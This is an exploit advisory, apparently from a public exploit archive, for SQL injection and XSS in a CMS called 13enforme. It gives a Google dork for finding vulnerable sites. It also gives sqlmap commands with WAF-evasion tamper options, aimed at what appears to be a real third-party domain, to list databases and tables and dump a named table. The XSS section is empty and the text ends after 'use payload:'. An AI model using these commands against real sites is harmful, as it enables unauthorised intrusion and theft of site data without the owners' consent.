# Exploit Title: 13enforme CMS SQL Injection & XSS Vulnerability
# Google Dork:intext:"13enForme" +inurl:.php?id=
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: http://www.13enforme.com
# Version: 1
# Tested on: Ubuntu
PoC 1:
The attacker once locate the sql vulnerability can perform an automated process to exploit the secruity in the webapp
http://www.site.com/content.php?id=[]'[SQL INJECTION VULNERABILITY!]
SQLMAP Payload(s):
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D db538822134 --tables
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D db538822134 -T plv
PoC 2 :
XSS Vulnerability
Payload(s) :
use payload: